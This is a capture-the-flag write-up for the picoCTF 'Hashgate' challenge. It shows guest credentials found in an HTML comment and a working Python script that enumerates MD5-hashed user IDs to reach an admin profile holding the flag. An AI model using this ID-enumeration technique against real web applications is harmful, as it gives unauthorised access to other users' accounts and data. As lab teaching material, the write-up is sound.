Hashgate

In index.html, we have:

<head>
    .
    .
<!-- Email: guest@picoctf.org Password: guest -->
</head>

Logging in, we are redirected to: /profile/user/e93028bdc1naacdfb3687181f2031765d:

Access level: Guest (ID: 3000). Insufficient privileges to view classified data. Only top-tier users can access the flag.

On checking, we get to know that the hash in url is MD5 hash of user ID.

The hints say that "There are about 20 employees in this organisation."

Working script:

import requests
import hashlib

base_url = 'http://crystal-peak.picoctf.net:57061/profile/user/'

for i in range(2980,3021):
    id_hash = hashlib.md5(str(i).encode()).hexdigest()
    response = requests.get(base_url + id_hash)
    if response.status_code == 200:
        print(f'Found for id: {i}')
        print(response.text)

ID 3016 is the admin, and gives the flag